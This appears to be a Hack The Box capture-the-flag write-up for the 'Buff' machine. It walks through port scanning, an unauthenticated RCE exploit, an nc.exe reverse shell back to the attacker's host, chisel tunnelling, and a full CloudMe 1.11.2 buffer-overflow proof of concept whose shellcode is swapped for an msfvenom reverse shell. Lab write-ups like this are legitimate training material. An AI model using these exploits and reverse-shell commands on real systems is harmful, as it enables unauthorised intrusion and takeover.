Buff HTB

IP

10.10.10.198

initial nmap scan

sudo nmap -p- --min-rate 10000 10.10.10.198 | cut -d"/" -f1 | tr '\n' ','

we have the following ports open on the target

8080

Lets try and get more information of the target

sudo nmap -sCV -p8080 10.10.10.198 -oA nmap_results

results

Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-02 06:16 EST
Nmap scan report for 10.10.10.198
Host is up (0.026s latency).

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-title: mrb3n's Bro Hut
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.43 seconds

Heading over to port 8080 we can see the following

lets get feroxbuster runnnig and see if we can find any hidden web pages

feroxbuster -u http://10.10.10.198:8080 -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,js -o dirs.txt

hunting around the website, within the contact.php we do find the application running the web app

we can try to find any vulnerabilities associated with this software, after abit of googling we find

Gym Management System 1.0 - Unauthenticated Remote Code ExecutionExploit Database

we can utilise the following exploit to gain a shell on the target

python2 exploit.py http://10.10.10.198:8080/ 

we now have a shell on the target machine

we do have limited functionality within this shell Lerts upload nc.exe and upgrade our shell

1. Lets start a smb server on our local machine

sudo python2 /opt/impacket-0.9.19/examples/smbserver.py shrek123 ./ -smb2support

1. Lets copy nc.exe over to the target (from our shell)

copy \\10.10.14.3\shrek123\nc.exe

1. Now lets start a listner

rlwrap -cAr nc -lvnp 9001

1. Now lets execute nc.exe and gain our shell

.\nc.exe -e cmd.exe 10.10.14.3 9001

we have our shell

when we check netstat we can see two ports listening only within the local host

netstat -ano

• 3306 MySQL

• 8888 XAmpp stack

Next lets grab the process ID of port 8888 (6044) and grep (findstr)

the PID does change every couple of seconds so to find it

netstat -ano | findstr 8888
tasklist /v | findstr 6044 # most recent PID

We can see there is a .exe file being executed, Lets see if we can find it

Looking through the user shaun directory we do find it within the downloads directory

What we can do next is see if we can find any vulnerabilities associated with this program

searchsploit CloudMe

• we can see the version number of CloudMe being 1.11.2

Now to exploit this service, we will need to tunnel from our local machine to the target machine , we can use the tool chisel for this

GitHub - jpillora/chisel: A fast TCP/UDP tunnel over HTTPGitHub

more specifically the .exe executable

https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_windows_amd64.gzgithub.com

We can transfer via our smb server

1. we will copy the Windows binary to the /programdata directory (where we will be staging in )

copy \\10.10.14.3\shrek123\chisel_1.9.1_windows_amd64 c.exe

1. Now we will run the Linux binary on our local machine in server mode

https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_linux_amd64.gzgithub.com

chmod +x chisel_1.9.1_linux_amd64
sudo ./chisel_1.9.1_linux_amd64 server -p 8000 --reverse

1. Next from our target machine, we will run chisel as the client

.\c.exe client 10.10.14.3:8000 R:8888:localhost:8888

1. Now if we run netstat on our local machine we should we are listening on port 8888

netstat -ano | grep 8888

Now that we have chisel set up Lets look at this exploit

searchsploit -m windows/remote/48389.py

The exploit

# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86

#Instructions:
# Start the CloudMe service and run the script.

import socket

target = "127.0.0.1"

padding1   = b"\x90" * 1052
EIP        = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS       = b"\x90" * 30

#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
payload    = b"\xba\xad\x1e\x7c\x02\xdb\xcf\xd9\x74\x24\xf4\x5e\x33"
payload   += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xa2\xfc"
payload   += b"\x89\xfe\x54\x82\x72\xff\xa4\xe3\xfb\x1a\x95\x23\x9f"
payload   += b"\x6f\x85\x93\xeb\x22\x29\x5f\xb9\xd6\xba\x2d\x16\xd8"
payload   += b"\x0b\x9b\x40\xd7\x8c\xb0\xb1\x76\x0e\xcb\xe5\x58\x2f"
payload   += b"\x04\xf8\x99\x68\x79\xf1\xc8\x21\xf5\xa4\xfc\x46\x43"
payload   += b"\x75\x76\x14\x45\xfd\x6b\xec\x64\x2c\x3a\x67\x3f\xee"
payload   += b"\xbc\xa4\x4b\xa7\xa6\xa9\x76\x71\x5c\x19\x0c\x80\xb4"
payload   += b"\x50\xed\x2f\xf9\x5d\x1c\x31\x3d\x59\xff\x44\x37\x9a"
payload   += b"\x82\x5e\x8c\xe1\x58\xea\x17\x41\x2a\x4c\xfc\x70\xff"
payload   += b"\x0b\x77\x7e\xb4\x58\xdf\x62\x4b\x8c\x6b\x9e\xc0\x33"
payload   += b"\xbc\x17\x92\x17\x18\x7c\x40\x39\x39\xd8\x27\x46\x59"
payload   += b"\x83\x98\xe2\x11\x29\xcc\x9e\x7b\x27\x13\x2c\x06\x05"
payload   += b"\x13\x2e\x09\x39\x7c\x1f\x82\xd6\xfb\xa0\x41\x93\xf4"
payload   += b"\xea\xc8\xb5\x9c\xb2\x98\x84\xc0\x44\x77\xca\xfc\xc6"
payload   += b"\x72\xb2\xfa\xd7\xf6\xb7\x47\x50\xea\xc5\xd8\x35\x0c"
payload   += b"\x7a\xd8\x1f\x6f\x1d\x4a\xc3\x5e\xb8\xea\x66\x9f"

overrun    = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))

buf = padding1 + EIP + NOPS + payload + overrun

try:
        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target,8888))
        s.send(buf)
except Exception as e:
        print(sys.exc_value)

we can see the following

• it opens a connection to the target on port 8888

• it sends a buffer

pretty simple right

we can utilize msfvenom to generate our own payload that will return a stageless (can catch with nc) reverse tcp shell

msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=9010 -b '\x00\x0A\x0D' -f python -v payload

Now we can change the payload within the existing exploit with our newly created payload we created with msfvenom

Now we can start our nc listener

nc -lvnp 9010

and we can run the exploit

python 48389.py

we now have a shell as administrator on the target machine